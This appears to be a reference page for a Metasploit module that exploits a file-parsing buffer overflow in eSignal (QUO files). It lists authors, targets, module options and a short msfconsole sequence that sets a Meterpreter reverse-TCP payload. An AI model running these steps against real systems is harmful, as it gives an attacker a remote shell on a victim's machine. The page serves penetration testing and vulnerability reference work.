eSignal and eSignal Pro <= 10.6.2425.1208 file parsing buffer overflow in QUO
The software is unable to handle "<StyleTemplate>" files (even those originally included with the program), such as those with the registered extensions QUO, SUM and POR. Successful exploitation of this vulnerability may take up to several seconds due to the use of an egghunter. Also, DEP bypass is unlikely due to the limited space for the payload.
Exploit Rank
- Normal
Exploit Authors
- Luigi Auriemma
- TecR0c < tecr0c [at] tecninja.net >
- mr_me < steventhomasseeley [at] gmai.com >
Exploit Targets
- 0 - Win XP SP3 / Windows Vista / Windows 7 (default)
Similar Exploit Modules
- exploit/windows/fileformat/a-pdf_wav_to_mp3
- exploit/windows/fileformat/acdsee_fotoslate_string
- exploit/windows/fileformat/acdsee_xpm
- exploit/windows/fileformat/activepdf_webgrabber
- exploit/windows/fileformat/adobe_collectemailinfo
- exploit/windows/fileformat/adobe_cooltype_sing
- exploit/windows/fileformat/adobe_flashplayer_button
- exploit/windows/fileformat/adobe_flashplayer_newfunction
- exploit/windows/fileformat/adobe_flatedecode_predictor02
- exploit/windows/fileformat/adobe_geticon
Exploit Usage Information
$ msfconsole
msf > use exploit/windows/fileformat/esignal_styletemplate_bof
msf exploit(esignal_styletemplate_bof) > show payloads
msf exploit(esignal_styletemplate_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(esignal_styletemplate_bof) > set LHOST [MY IP ADDRESS]
msf exploit(esignal_styletemplate_bof) > exploit
Exploit Module Options
| Option | Description |
| --- | --- |
| FILENAME | The file name. (default: msf.quo) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
